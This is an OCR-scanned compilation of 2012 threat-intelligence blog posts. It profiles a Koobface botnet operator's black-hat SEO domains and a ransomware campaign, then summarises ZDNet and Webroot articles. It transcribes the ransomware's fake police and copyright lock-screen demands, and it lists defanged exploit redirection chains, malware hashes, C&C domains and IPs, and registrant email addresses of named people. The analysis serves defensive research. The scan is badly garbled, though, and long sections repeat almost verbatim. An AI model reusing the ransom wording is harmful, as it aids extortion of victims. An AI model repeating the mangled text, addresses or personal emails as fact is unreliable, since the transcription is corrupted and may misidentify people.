Pheave note: This fine may only be paid within 48 hows, € you 
let 48 hours pass without payment, 
oid’ [= the possiblity of unlocking your computer expares. 


You cam be clearly identified by your [P address and the associated hosmame In this case a criminal case against you will be initiated 


astomatically. 
Your Computer has been locked! do ~ Q—E==== 
How to unlock? 


Iegally dowsleaded material (MP3's, Movies or Software) has bees —_ In accordance with the Law "Oe Control and Protection of Information” on 

located om your computer 0201/2012 You have to pay a fine of L00E . Foe the convenience of paying a fine offer to 
use a secure form of parmert through vouchers Ukash / PaysafeCard. You need to bur 

By downloading, those were reproduced, thereby mmvobing a criminal offense «Vouchers im the amount of £100, adber G8 mm the appeopriate fields, cick "OK" 

under Section 106 of Copyright Act 


CONTENT BLOCKED 


The downdoading of copyrighted matenal vas the mternet or mute sharng 
networks is Hegal and is im accordance with SOPA & PIPA 
Section 106 of the Copyright Act subject to 2 fine or imprisonment for 

2 penalty of wp to 3 years ——_——__—__— 


Futhermoce, possession of Begally downkoaded material is punishable under 
Section 184 paragraph 3 of the Crmmnal Code and may also lead to the 
confiscation of the competer, with which the diles were downloaded 


Additional malicious payload obtained from the campaign: 

[10]MD5: fd47fe3659d7604d93c3ce0c0581fed7 - detected by 4 out of 44 antivirus scanners 
as Exploit:Java/CVE-2012-5076.BBW 

[11]MD5: e47991d7f172e893317f44ee8afe3811 - detected by 5 out of 44 antivirus scanners 
as JS:Pdfka-gen [Expl] 

[12]MD5: 7e58703026c7ffba05acOd2ae4d3c62f - detected by 5 out of 44 antivirus scanners 
as Exploit:Java/CVE-2012-1723!generic 


Ransomware C &C malicious domain name reconnaissance: 
sarscowoy.com - currently responds to 176.28.22.32 (AS20773); 176.28.14.42 (AS20773) - 
Email: rmasela@ymail.com 


On 2012-06-21 the domain responded to 204.13.160.28 (AS33626), then on 2012-07-01 
it changed IPs to 46.163.113.79 (AS20773), then again on 2012-11-14 it changed IP to 
176.28.14.42 (AS20773), followed by one last change on 2012-11-24 to 176.28.22.32 
(AS20773) 


One more MD5 is known to have phoned back to the same Ransomware C &C URL - 


[13]MD5: 1600577edecelefel1c75158f9dd24db - detected by 28 out of 38 antivirus scanners 
as Trojan:Win32/Tobfy.H 
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Interestingly, the cybercriminals behind the Ransomware left the administration panel 
open to anyone who wants to take a look at the way the whole process works. 


Sample screenshot of the administration panel: 


Multi Locker Lending Editor 


Login system: 


This page was produced in 0.0005 seconds. 


Second screenshot of the administration panel, showing a directory listing, including unique 
and localized files for potential victims from multiple countries: 
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Name 
[2] .0s_store 


Size 
15,00 KB 


13:49 11-21-2012 


AT.php 12,59 KB 666 14:54 11-24-2012 qe Sty 
BE.php 11,03KB 666 13:4911-21-2012 [FAC RYT 
[i] CH.php 12,63 KB 666 17:06 11-23-2012 [Fe RR 
CY.php 19,20 KB 666 13:49 11-21-2012 de Sy 
DE.php 12,31 KB 666 13:4911-21-2012 [Fac ART 
EN.php 7,96KB 666 13:4911-21-2012 [Fac RY Ty 
ES.php 203,65 KB 666 01:36 11-22-2012 de Sy 
FLphp 11,43 KB 666 13:49 11-21-2012 ae Sty 
FR.php 11,87KB 666 13:4911-21-2012 [Fae YT 
GB.php 8,25 KB 666 13:49 11-21-2012 de Sy 
GR.php 4,03 KB 666 00:21 11-23-2012 qe 4 iy 
IT.php 11,70KB 666 13:4911-21-2012 [FAC ART 
[E) NUphp 11,03 KB 666 13:49 11-21-2012 de Sy 
PL.php 11,14 KB 666 13:49 11-21-2012 qe 4 iy 
PT.php 11,45KB 666 13:4911-21-2012 [Fae RYT 
(i) RO.php 101,50 KB 666 19:28 11-22-2012 [Fac RAT 
SE.php 11,88 KB 666 13:49 11-21-2012 de Sy 
US.php 101,50KB 666 13:4911-21-2012 [Fac RYTy 
getunlock.php 4268 644 13:4911-21-2012 [Fac YT 
index.php 2,72KB 644 13:4911-21-2012 [Fae ART 
jquery1.3.1.js 114,58 KB 644 13:49 11-21-2012 Ale 4H | 
picture.php 1,10KB 644 13:4911-21-2012 [Fac RATT 
[F) style.css 1,54 KB 644 13:49 11-21-2012 de 4 iy 
tds.php 1,10 KB 644 13:49 11-21-2012 ae Sty 
unlock.php 1068 644 13:4911-21-2012 [Fac RR 


More domains are currently responding to the same IPs (176.28.22.32; 176.28.14.42): 
bussinesmail.org - Email: belov28@gmail.com 
elitesecuritynet.com - Email: pescifabio83@yahoo.fi 
ideasdeunion.com - Email: esbornikk@aol.com 
ineverworrynet.com - pescifabio83@yahoo.fi 
testcitycheckers.com - pescifabio83@yahoo.fi 
uneugroup.com - Email: anders _christensen@yahoo.com 
winntegroups.eu - Email: robertobona69@yahoo.com 
sexchatvideo.org - Email: daddario.maria@virgilio. it 
quasarnet.co - Email: valter.bars@venezia.pecavvocati.it 
bestconsultingoffice.com 

apaineal.ru 


What we've got here is a great example of the following - when you don’t fear legal 
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prosecution for your fraudulent activities over a period of several years, earning you poten- 
tially hundreds of thousands of dollars, you just launch new projects, continuing to cause more 
harm and fraudulently obtain funds from infected victims. 


For those who are interested in more details on the technical side of this Ransomware, 
you should [14]consider going through this research. 


Hat tip to Steven Adair from [15]Shadowserver for the additional input. 


This post has been reproduced from [16]Dancho Danchev’s blog. Follow him 
[17]on Twitter. 


1 hictp//adanchev blogspot. con/2012/04/shos-bebind-Koob¥ace-botuet=osint tall 
2. http://www.nytimes.com/2012/01/17/technology/koobface-gang-that-used-facebook-to-spread-worm-operates-in- 
See //asscuer oeeo con) 000/01 acing cise ise cecuyseae a fooo. weal 

4. http: //ddanchev. blogspot . com/2012/01/whos~behind-koobface-botnet-osint .html 
5. 


ttps://www. google. com/webhp?hl=enktab=ww#thl=en&tbo=d&sclient=psy-abkq=site:ddanchev.blogspot.comtkoobface 


scareware&oqg=site:ddanchev.blogspot.com+koobfacetsca 
ttp://ddanchev.blogspot.com/2010/05/koobface- gang-responds-to-10-things-you.htm 
ttp://ddanchev. blogspot .com/2010/05/koobface-gang-responds-to-10-things-you. htm 


6. 

7. 

8. http://cve.mitre.org/cgi-bin/cvename .cgi?name=CVE- 2008-535 

9. https://www.virustotal .com/file/7e8390200ac14f 0dbf 2b5abe9f 55ec5dd3d5c87c8557 f 0ac8c33eacdd194bd1a/analysis/ 
1353887136/ 


10. 
12. 
13. 


14. http://www. xylibox.com/2012/11/multi-locker.htm 
15. http://www. shadowserver.org/ 
16. http://ddanchev. blogspot .com/ 


17. http://twitter .com/danchodanche 


8.11.5 Koobface Botnet Master KrotReal Back in Business, Distributes Ransomware 
And Promotes BHSEO Service/Product (2012-11-26 03:52) 


On January 09, 2012 | exposed [1]Koobface botnet master KrotReal. On January 16, 2012, 
[2]The New York Times went public with data from Facebook Inc. exposing the identities 
of the rest of the group. What happened? With the botnet masters still at large, and the 
Koobface botnet currently offline, a logical question emerges - what are these cybercriminals 
up to now that they’re no longer involved in managing Koobface? 


Cybercrime as usual! 
4059 


Continuing to [3]squeeze the cybercrime ecosystem, and keep known bad actors on a 
short leash, in this intelligence brief I'll expose [4]Anton Nikolaevich Korotchenko a.k.a 
KrotReal’s s latest activities, indicating that he’s currently busy experimenting with two 
projects: 


¢ A Black Hat (SEO) Search Engine Optimization related service/product 


¢ Underground traffic exchange/pay-pay-install network currently distributing localized Ran- 
somware 


Just like the case when KrotReal’s real life identity was revealed due to a single mistake he 
made over a period of several years, namely to register a Koobface command and control 
server using his personal GMail account, in this intelligence brief I'll once again expose his 
malicious and fraudulent activities by profiling two of the most recently domains he once 
again registered with his personal GMail account. 


Let’s start by profiling his Black Hat SEO service/product, currently hosted on one of the 
domains he registered in 2011. 


trafficconverterin - 176.9.146.78 - Email: krotreal@gmail.com 
Created On:28-Jul-2011 12:37:45 UTC 
Last Updated On:28-Jun-2012 08:11:43 UTC 


Expiration Date:28-Jul-2013 12:37:45 UTC 
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Capabilities Blogger Yoom CMS Wordpress 


Using an external domain v4 4 limited 
Disk Space x v4 limited 
Edit the template / css ww 4 limited 
Access to the Sitemap and Robots.txt x iY 4 limited 
Support for meta tags partially 4 4 
Support categories partially 4 4 
Import xml y 4 limited 
Backup and Export Template A 4 partially 
Built-in hosting for images Google Picasa Ovm Ovm 
Lack of reference to developer 4 partially partially 
Multi-user access partially 4 partially 
Built-in statistics A A a 
Russian-language technical support x ov limited 
Result 9 21 16 


The service/produce apparently allows the systematic abuse of legitimate blogging platforms 
such as Google’s Blogger and Wordpress, next to Yoom CMS. KrotReal himself might be using 
the tool, or sell/offer access to it as a managed service. Does this mean he’s not using it by 
himself to monetize the hijacked legitimate traffic that he’s able to obtain through his Black 
Hat SEO campaigns? Not at all. 


More domains presumably to be used for Black Hat SEO purposes registered with KrotReal’s 
personal email account (krotreal@gmail.com): 


superstarfind.com 
celeb-search.com 
myown-search.com 
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myfindstuff.com 
network-find.com 
coolfind200309.com 
experimentsearch.com 
fashion-overview.com 
krotpong.com 
adultpartypics.com 
findhunt.com 


How is he actually monetizing the hijacked traffic? Keep reading. Now it’s time to ex- 
pose his malicious activities in the form of spreading localized Ransomware variants. For 
the record, [5]the Koobface gang distributed primarly scareware - there’s evidence that the 
group was also involved in other [6]malicious campaigns - and even [7]bragged about the 
fact that they’re not damaging infected user PCs. 


What’s particularly interesting about profiling this campaign, is that it’s a great example 
of double-layer monetization, as KrotReal is earning revenue through the Traffic Holder Adult 
Affiliate Program, in between serving client-side exploits and ultimately dropping Ransomware 
on the affected host using the same redirection chain. 


adultparypics.com 
alicelebrity.ru A NEY 176.9.0.0/16 ss AS24940 


A > 
” Od ieth 78 PTR 


traffictracker.in Static.78.146.9.176.clients your-server.de 


www.allcelebrity.ru 


Sample malicious domain name reconnaissance: 
traffictrackerin - 176.9.146.78 (AS24940) - Email: krotreal@gmail.com 
Created On:22-Nov-2011 13:42:53 UTC 


Last Updated On:22-Nov-2012 22:33:25 UTC 
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Expiration Date:22-Nov-2013 13:42:53 UTC 


Responding to the same IP 176.9.146.78 (AS24940): 


allcelebrity.ru 
easypereezd.ru 


Sample malicious’ activity redirection chain: hxxp://traffictracker.in/in.cgi?11 
&parameter=nude-+girls &CS=]1 -> hxxp://celeb-search.com/in.php?source=th 
&g=nude-+girls -> hxxp://celeb-search.com/in3.php?source=th &q=nude-+girls 
-> hxxp://www. trafficholder.com/in/in2. php ?ppillow-pics _erotic -> 
hxxp://hit.trafficholder.com/cgi-bin/traffic/process.fcgi?a=ppillow &c=1 &n=pics erotic 
&r= ->  hxxp://gravityexp.com/go.php?sid=12 ->  hxxp://nosnowfevere.com/ZqRqk 
(exploiting [8]CVE-2008-5353) -> hxxp://nosnowfevere.com/oxsXAE?KpDzQ=61 
-> hxxp://nosnowfevere.com/ZqRqk -> hxxp://nosnowfevere.com/EHSvFc -> 
hxxp://nosnowfevere.com/XMDrkH 


KrotReal’s Traffic Holder Adult Affiliate Network ID is ppillow-pics erotic. 
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Begetee News FAQ Corfact Cantera Service 


> Traffic Holder 


Servieg Industry Professionals 


hecount Holders (i  —  o-% Salen ial 
= : = 


Available Traffic 
Register Now 
~ Tes 


Buy Traffic 
Sell Traffic 
Affiliate Program 


Testing System 


Traffic Holder rewiers internet marketing service: for sds webmasters since 2006. 
We provide quality clicked sdJt traffic for edut and moved wetsles. Oe primary 
geet is te secure macnn esenings for traffic sellers ad reeset sdvertegens teres 
for traffic Ouyers. Our sdvertising pistform is powered with so sSexce of over 50D 
million moctihly urers. We offer utestatle prices on equal quality tra’. 


PayPal DIRECT Payoneer Gvenney 
=CBvsaE © co” 


Traffic Holder now provides FREE traffic to its TOP traffic Sellers. 


4 an Live Help Offline et 
(- a Every Monday we send quality geo-fitered niche traffic to our TOP 10 selling domains for free. That means: 


« the more traffic you sell with us - the more hits you get back (so that you earn and make your resource grow 


‘= at the same time). 
a! Click here 
{ to leave If you would like to partipicate in this offer, you just need to send as much traffic as you can to be published 
a message in the TOP 10 list. If your domain is published - you get free traffic to your site this week. 
j Please be aware: You have no ability to monetize Free Traffic Back bonus or send it to another URL. 
f 2 The TOP 10 list is published at the following URL: hrp://trafficholder.conytop. him! 
Live Chat oy Livererton 
RRRRR 
read all news... 
2 : 
4 How to get started System Stats Main Features 
Hits received last 24 hours: 26,600,671 J Instant Deposits & Instant Withdrawals 
i >. 
Hits eet hours: — J Geo Fatration for any niche /type 
_/ Youmay purchase traffic to adult and non-edult 
Top 5 niches: Top 5 Sellers: websites 


Malicious domain names reconnaissance: 


gravityexp.com - returns "Digital River GmbH" on its home page - 46.163.117.144 - Email: 
francesca.muglia.130@istruzione. it 


Updated Date: 30-aug-2012 
Creation Date: 30-aug-2012 


Expiration Date: 30-aug-2013 
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nosnowfevere.com - 91.211.119.32 - Email: djobroning@definefm.com 
Updated Date: 25-nov-2012 
Creation Date: 25-nov-2012 


Expiration Date: 25-nov-2013 


Upon successful client-side exploitation, the campaign drops [9]MD5: 
d234a238eb8686d08cd4e0b8b705dal4 - detected by 10 out of 43 antivirus scanners as 
Trojan.Winlock.7431 


Sample screenshot displayed to users from geolocated countries: 
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es 


boeteo ——— 


Your PC is blocked due to at least one of the reasons specified below. 
REVIEW THE VIOLATION(S} BELOW, AMD FOLLOW INSTRUCTIONS TO COMPLY! 


Your have sccessed and/or distributed Megal copyrighted material, and are in direct violation of the Intellectual Property Clause, Article |, Section 8, 
Clause 5 of the United Stetes Constitution 


tion 8, Clause & of the Criminal Code provides for a tine of two to five hundred minimal wages or 9 deprivation of liberty for two to eight 


Article 1, Se 
years 


You have viewed or distributed flegal pornographic content, such at child pornography or zoophilia, acd are in direct violation of the Title 18, Section 
§2252 of the iid pornography (% U.S.C 


7 
eee} 


ode. It is » federal crime to knowingly possess, manufacture, distrute, or socess with intent to view c 


matware, that you ore violating the law 
tion of Hiberty for fox 


your knowledge or consent, your PC may be infected t 
the Criminal Code pro 


d from your PC with: 


+ has been inttit 
nal Computer, Article 210 


(egal ac 
on Neglecttul Use of Per 


and / 


t for» fine of up to $ HO, 


nine years 


Purtuant to the affirmative defense sections in the above lows, os well a3 9 possibility of malwore/wirus infection on your sytem, which has led to the 


orary amendment in effect, which allows the payment of fine in the amount of $200 for off first-time offenders 


violation|s) above, there & a temp 
under the above statues 


Keep in mind, that » repeat offence wil be prosecute: 


computer agsinst uneuthorized scoces 


to the full extent of the low, If neglect is proven in court for not using adequate means of 


protection for you by meiwere/virus, you may stil be charged with sbove 


YOUR PAYMENT MUST ME SUBMITTED NOT LATER THAN 72 HOURS AFTER THE INITIAL BLOCK, IF NO PAYMENT IS RECEIVED IN THIS TIMEFRAME, ALL 
CASES ARE AUTOMATICALLY FORWARDED TO THE US DEPARTMENT OF JUSTICE TO BEGIN CRUWINAL PROCEEDINGS 


To unlock the computer, you must pay the fine through Moneypsk of 2005, 
Mow do I unkeck computer using MoneyPak? 


Qe o 716 


col retail location where the MoneyPaks are sold. They are usualy located in the prepaid section 
d to the caimier and load the card with cash. A 4.95 fee wil be added by the retailer 
Enter the digits under the scratch-off rection of the MoneyPak card in the window below, one digit at 2 time 


pay the fine, your PC will get unlocked in 1 to 48 hours after the money Is put into the State sccount. In case an error cocurs, youll have to 
mall tine@ht gov (Do not forget to specity IP address } 


When yx 
tend the code by 


Enter the MoneyPak code 
Enter the code Morey®ab- amour ® sx 


Where can | buy a MoneyPak? 


' z 3 ‘ s 6 7 s 9 0 You can Suy and load the card 


at mort pharmacte: and retail store lecations 


MoneyPuk & evelable at the below locations. For o full let, pleare wet the 
Cotete wetcre 


To enter a code, use the virtual keyboard Walmart >'< CVS prarmacy i 8 UWhetyeeane 


Second screenshot of a sample page displayed to affected U.K users: 
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f % 
} International Police Association - [AC 


¥ 

; 

. 

\ 
d international Administration Cerfer 


Al activity of this computer has been recorded. If you use webcam, videos —_-Pleae follow the instruction on the right Bs 
and pienures were saved foe identification webcam Ukasheode[~ SS~S~S~«~Ci € 
S0£ 
© 100£ 
Pre code @ Okash apoysoie 


cs0£ ¢ a 
7 


® 1008 


Please note: This fine may only be paid within 48 hows, f you 
let 48 hours pass without payment, 
Your IP-Address:Kieeemeeeeeeeeedl the possiblity of unlocking your computer expaes. 


You can be clearly identified by your [P address and the associated hostname . = r bs 
Is this case a criminal case against you will be initiated 
astomatically. 


Your Computer has been locked! b> ~ QrE=== 


Hore to unlock? 


Wegally dowsloaded material (MP3's, Movies or Software) has beea — In accordance with the Law "Os Control and Protection of Information™ on 

located om vour computer 0201/2012 You have to pay a fine of 100 . Foe the convenience of paying a fine offer to 
use a secure form of payment through vouchers Ukash / PaysafeCard. You need to bur 

By downloading, those were reproduced, thereby involving a criminal cense «= Vouchers the amount of £100, aber G8 ms the appeopriate Gelds, chek "OK" 

under Section 106 of Copyright Act 


CONTENT BLOCKED 


The downloading of copyrighted material via the auternet or mantic sharing 
networks is Begal and is im accordance with SOPA & PIPA 
Section 106 of the Copyright Act subject to 2 fine or impriseameat for ; 

2 pesalty of ep to 3 years 


Futherincee, possession of Begally downboaded material is punishable under 
Section 184 paragraph 3 of the Creminal Code and may also lead to the 
confiscation of the competer, with which the diles were downloaded 


Additional malicious payload obtained from the campaign: 


[10]MD5: fd47fe3659d7604d93c3ce0cO581fed7 - detected by 4 out of 44 antivirus scan- 
ners as Exploit:Java/CVE-2012-5076.BBW 


[1L]JMD5: e47991d7f172e893317f44ee8afe3811 - detected by 5 out of 44 antivirus scan- 
ners as JS:Pdfka-gen [Expl] 


[12]MD5: 7e58703026c7ffba05acOd2ae4d3c62f - detected by 5 out of 44 antivirus scan- 
ners as Exploit:Java/CVE-2012-1723!generic 


Ransomware C &C malicious domain name reconnaissance: 


sarscowoy.com - currently responds to 176.28.22.32 (AS20773); 176.28.14.42 (AS20773) 
- Email: rmasela@ymail.com 
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On 2012-06-21 the domain responded to 204.13.160.28 (AS33626), then on 2012-07-01 
it changed IPs to 46.163.113.79 (AS20773), then again on 2012-11-14 it changed IP to 
176.28.14.42 (AS20773), followed by one last change on 2012-11-24 to 176.28.22.32 
(AS20773) 


One more MD5 is known to have phoned back to the same Ransomware C &C URL - 
[13]MD5: 1600577edecelefel1c75158f9dd24db - detected by 28 out of 38 antivirus scanners 
as Trojan:Win32/Tobfy.H 


Interestingly, the cybercriminals behind the Ransomware left the administration panel 
open to anyone who wants to take a look at the way the whole process works. 


Sample screenshot of the administration panel: 


Multi Locker Lending Editor 


Login system: 


This page was produced in 0.0005 seconds. 


Second screenshot of the administration panel, showing a directory listing, including unique 
and localized files for potential victims from multiple countries: 
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Name Size Perm Modified Vw Ed Rn DI Rm 


[2] .0s_store 15,00 KB 644 13:49 11-21-2012 de E47 
AT.php 12,59 KB 666 14:54 11-24-2012 qe Sy 
BE.php 11,03 KB 666 13:4911-21-2012 [Fac ART 
[i] CH.php 12,63 KB 666 17:06 11-23-2012 de RAT 
CY.php 19,20 KB 666 13:49 11-21-2012 de Sy 
DE.php 12,31 KB 666 13:49 11-21-2012 de Sy 
EN.php 7,96KB 666 13:4911-21-2012 [Fac AY Ty 
ES.php 203,65 KB 666 01:36 11-22-2012 de Sy 
FLphp 11,43 KB 666 13:49 11-21-2012 ae Sy 
FR.php 11,87KB 666 13:4911-21-2012 [Fae Rly 
Py GB.php 8,25KB 666 13:49 11-21-2012 de Sy 
GR.php 4,03 KB 666 00:21 11-23-2012 de S417 
TT.php 11,70KB 666 13:4911-21-2012 [Fae RYT 
[E) NUphp 11,03 KB 666 13:49 11-21-2012 de iy 
PL.php 11,14 KB 666 13:49 11-21-2012 qe Sy 
PT.php 11,45 KB 666 13:4911-21-2012 [Fac ART 
(i) RO.php 101,50 KB 666 19:2811-22-2012 [Fae ARTY 
SE.php 11,88 KB 666 13:49 11-21-2012 de Sy 
US.php 101,50 KB 666 13:4911-21-2012 [Fac Ty 
[E) getunlock.php 4268 644 13:4911-21-2012 Fac RYT 
index.php 2,72KB 644 13:4911-21-202 [Fide RYT 
jquery1.3.1.js 114,58 KB 644 13:49 11-21-2012 de Ty 
picture.php 1,10 KB 644 13:4911-21-2012 [Fae RYT 
(7) style.css 1,54KB 644 13:49 11-21-2012 de Sy 
tds.php 1,10 KB 644 13:49 11-21-2012 de ST 
unlock. php 1068 644 13:4911-21-2012 [Fac ERT 


More domains are currently responding to the same IPs (176.28.22.32; 176.28.14.42): 
bussinesmail.org - Email: belov28@gmail.com 

elitesecuritynet.com - Email: pescifabio83@yahoo.fi 

ideasdeunion.com - Email: esbornikk@aol.com 

ineverworrynet.com - pescifabio83@yahoo.fi 


testcitycheckers.com - pescifabio83@yahoo.fi 
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uneugroup.com - Email: anders _christensen@yahoo.com 
winntegroups.eu - Email: robertobona69@yahoo.com 
sexchatvideo.org - Email: daddario.maria@virgilio. it 
quasarnet.co - Email: valter.bars@venezia.pecavvocati.it 
bestconsultingoffice.com 


apaineal.ru 


What we’ve got here is a great example of the following - when you don’t fear legal 
prosecution for your fraudulent activities over a period of several years, earning you poten- 
tially hundreds of thousands of dollars, you just launch new projects, continuing to cause more 
harm and fraudulently obtain funds from infected victims. 


For those who are interested in more details on the technical side of this Ransomware, 
you should [14]consider going through this research. 


Hat tip to Steven Adair from [15]Shadowserver for the additional input. 


1. http: //ddanchev. blogspot . com/2012/01/whos-behind-koobface-botnet-osint . htm] 

2. http://www.nytimes.com/2012/01/17/technology/koobface-gang-that-used-facebook-to-spread-worm-operates-in- 
3. http: //ddanchev. blogspot . com/2009/01/squeezing- cybecrime- ecosystem-in-2009. html 

4. http: //ddanchev . blogspot . com/2012/01/whos-behind-koobface~botnet-osint .html 

5. https: //www.google.com/webhp?hl=en&tab=ww#hl=enktbo=d&sclient=psy-ab&q=site : ddanchev. blogspot .comtkoobface 


6. 

7. 

8. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE- 2008-535 

9. https://www.virustotal.com/file/7e8390200ac14f 0dbf 2b5abe9f55ec5dd3d5c87c8557f0ac8c33eacdd194bdia/analysis/ 
1353887136/ 


10. 
12. 
13. 


14. http: //www.xylibox.com/2012/11/multi-locker. html 
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15. http://www. shadowserver.org/ 


8.11.6 Summarizing ZDNet’s Zero Day Posts for November (2012-11-30 15:55) 


mONer Blo 


Zero Day 


Ryan Naraine Latest Posts 


Ryan fh Syria suffers Internet ‘blackout’; cut off from the outside 
te world 


—pec, ar . 
kis dl wie . “The best of ZDNet, delivered 
1 Comment 3 Votes ZDNet Newsletters 
» 


Get the best of ZONet delivered straight to 


Researcher reveals backdoor access in Samsung printers 


Samsung perter n 
vt ” 
a. vi us: 
as laivad ajor news it ng. Ace you ready? 
neg er has onty the mo 
Violet Bive ortant tech news nothing elve 


A patched browser - false feeling of security or a security 
utopia that actually exists? 
persky Lab's recently released “Global Web 
pe and Seaurty Trend 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for November, 2012. 
You can subscribe to [2]Zero Day’s main feed , or follow me on Twitter: 


x 


01. [3]Opera for Mac OS X patches six security vulnerabilities 

02. [4]Cybercriminals start spamvertising Xmas themed scams and malware campaigns 
03. [5]Apple releases QuickTime 7.7.3 for Windows, patches critical security vulnerabilities 
04. [6]Active XSS flaw discovered on eBay 

05. [7]A patched browser - false feeling of security or a security utopia that actually exists? 


This post has been reproduced from [8]Dancho Danchev’s blog. Follow him 
[9]Jon Twitter. 


4071 


1. http: //zdnet.com/blog/securit 
2. http: //feeds.feedburner.com/zdnet/securit 
3. 


ttp://www.zdnet .com/opera-for-mac-os-x- patches-six-security-vulnerabilities-7000007174/ 


4. http://www.zdnet .com/cybercriminals-start-spamvertising-xmas-themed-scams-and-malware-campaigns-70000071 
5. http: //www.zdnet .com/apple-releases-quicktime-7-7-3-for-—windows-patches-critical-security-vulnerabilities 
7000007 184/ 

6. http: //www.zdnet .com/active-xss-flaw-discovered-on-ebay-7000007539/ 

7 


. http://www.zdnet .com/a-patched-browser-false-feeling-of-security-or-a-security-utopia-that-actually-exist 


s-7000007541/ 
ttp://ddanchev. blogspot .com/ 


ttp://twitter .com/danchodanche 


8. 
9. 


8.12 December 


8.12.1 Summarizing Webroot’s Threat Blog Posts for November (2012-12-01 00:31) 


threat blog 


Home About the Bloggers Webroot.com RSS Feed 


‘ s H ” Archives 

Bogus ‘Meeting Reminder” themed Saree 
emails serve malware 

Referral Program 
week 0 . 

Free security for your 
By Dancho Danchev friends AND a donation 

to charity 

Free tools 

Downtoad a free trial 
Read More = 
Ted your thends Ei Facedook [J tTweer GB O93 cS Reco: © sumswupen Eman [ie wore Open o support ticket 


Check the reputation of 
© URL of IP address 


e e e = Connect with wst 
Cybercriminals impersonate T-Mobile 
U.K, serve malware 
canes Cwitter 
By Dancho Danchev facebook 

You (ii 

Read More Google + 
Ted your trieest Bi Facedoot « [J twee Boies <S Recat © Sumsielpen emai (5) ore 
ae a Subscribe by email 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for November, 
2012. You can subscribe to my [2]Webroot’s Threat Blog RSS Feed 
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or follow me on Twitter: 


a 


01. [3]BofA ‘Online Banking Passcode Reset’ themed emails serve client-side exploits and 
malware 

02. [4]‘ADP Immediate Notification’ themed emails lead to Black Hole Exploit Kit 

03. [5]USPS ‘Postal Notification’ themed emails lead to malware 

04. [6]‘Fwd: Scan from a Xerox W. Pro’ themed emails lead to Black Hole Exploit Kit 

05. [7]‘Your Discover Card Services Blockaded’ themed emails serve client-side exploits and 
malware 

06. [8]‘Payroll Account Holded by Intuit’ themed emails lead to Black Hole Exploit Kit 

07. [9]‘American Express Alert: Your Transaction is Aborted’ themed emails serve client-side 
exploits and malware 

08. [10]Cybercriminals abuse major U.S SMS gateways, release DIY Mail-to-SMS flooders 

09. [11]‘PayPal Account Modified’ themed emails lead to Black Hole Exploit Kit 

10. [12]Bogus Better Business Bureau themed notifications serve client-side exploits and 
malware 

11. [13]Cybercriminals spamvertise bogus eFax Corporate delivery messages, serve multiple 
malware variants 

12. [14]Bogus IRS ‘Your tax return appeal is declined’ themed emails lead to malware 

13. [15]‘Copies of Missing EPLI Policies’ themed emails lead to Black Hole Exploit Kit 

14. [16]Cybercriminals spamvertise bogus ‘Microsoft License Orders’ serve client-side exploits 
and malware 

15. [17]Cybercriminals resume spamvertising ‘Payroll Account Cancelled by Intuit’ themed 
emails, serve client-side exploits and malware 

16. [18]Cybercriminals spamvertise millions of FDIC ‘Your activity is discontinued’ themed 
emails, serve client-side exploits and malware 

17. [19]Cybercriminals release stealthy DIY mass iFrame injecting Apache 2 modules 

18. [20]Multiple ‘Inter-company’ invoice themed campaigns serve malware and client-side 
exploits 

19. [21]Bogus Facebook ‘pending notifications’ themed emails serve client-side exploits and 
malware 

20. [22]Cybercriminals target U.K users with bogus ‘Pay by Phone Parking Receipts’ serve 
malware 

21. [23]Bogus DHL ‘Express Delivery Notifications’ serve malware 

22. [24]Cybercriminals impersonate Vodafone U.K, spread malicious MMS notifications 

23. [25]Cybercriminals impersonate T-Mobile U.K, serve malware 

24. [26]Bogus ‘Meeting Reminder” themed emails serve malware 

25. [27]Bogus ‘Intuit Software Order Confirmations’ lead to Black Hole Exploit Kit 

26. [28]Bogus ‘End of August Invoices’ themed emails serve malware and client-side exploits 


This post has been reproduced from [29]Dancho Danchev’s blog. Follow him 
[30]Jon Twitter. 


1. http://blog.webroot .com/ 
2. http://feeds2.feedburner.com/WebrootThreatBlog 


3. http://blog. webroot . com/2012/11/01/bofa-online-banking-passcode-reset-themed-emails-serve-client-side-exp 


loits-and-malware/ 


4. http://blog.webroot.com/2012/11/02/adp-immediate-notification-themed-emails-lead-to-black-hole-exploit-ki 


7. bhttp://blog.webroot .com/2012/11/08/your-discover-card-services-blockaded-themed-emails-serve-client-side- 


exploits-and-malware/ 


8. http://blog. webroot .com/2012/11/09/payroll-account-holded-by-intuit-themed-emails-lead-to-black-hole-exp 


9. http://blog.webroot .com/2012/11/12/american-express-alert-your-transaction-is-aborted-themed-emails-serve 


client-side-exploits-and-malware/ 


10. http://blog.webroot.com/2012/11/13/cybercriminals-abuse-major-u-s-sms-gateways-release-diy-mail-to-sms 


11. http://blog.webroot.com/2012/11/14/paypal-account-modified-themed-emails-lead-to-black-hole-exploit-kit/ 


12. http://blog.webroot .com/2012/11/15/bogus-better-business-bureau-themed-notifications-serve-client-side- 


exploits-and-malware/ 


13. ttp://blog.webroot .com/2012/11/16/cybercriminals-spamvertise-bogus-efax-corporate-delivery-messages-se 


rve-multiple-malware-variants/ 


14. http://blog.webroot .com/2012/11/19/bogus- irs-your-tax-return-appeal-is-declined-themed-emails-lead-to-m 


15. http://blog.webroot .com/2012/11/20/copies-of-missing-epli-policies-themed-emails-lead-to-black-hole-exp 


1 ttp://blog.webroot .com/2012/11/21/cybercriminals-spamvertise-bogus-microsoft-license-orders-serve-clie 


6. 
nt-side-exploits-and-malware/ 
7 


1 


ttp://blog.webroot .com/2012/11/22/cybercriminals-resume-spamvertising-payroll-account-cancelled-by-int 


it-themed-emails-serve-client-side-exploits-and-malware/ 


2 ttp://blog.webroot .com/2012/11/27/multiple-inter-company- invoice-themed-campaigns-serve-malware-and-c 


0. 
ent-side-exploits/ 
1 


i 
2 ttp://blog.webroot .com/2012/11/27/bogus-facebook- pending-notifications-themed-emails-serve-client-side 


exploits-and-malware/ 
22 


ttp://blog.webroot .com/2012/11/27/cybercriminals-target-u-k-users-—with-bogus-pay-by-phone-parking-rece 


23 


. http: //blog.webroot.com/2012/11/28/bogus-dhl-express-delivery-notifications-serve-malware/ 


side-exploits/ 
9. http: //ddanchev.blogspot.com/ 
30. http://twitter.com/danchodanche 


4074 


8.12.2 Upcoming Portfolio of Commercially Available CYBERINT Reports 
(2012-12-13 13:38) 


How likely are you to purchase 
commercially availalble CYBERINT 
reports conducted by Dancho 
Danchev? 


Quality speaks for itself, right 
away! 

Depends on the topics covered 
in the reports 

I'm very price-conscious, the 
price will shape my decision- 
making process 

| don't intend to buy any 
commercially available CYBERINT 
reports 


| Vote | Show results 
Valued blog readers, 


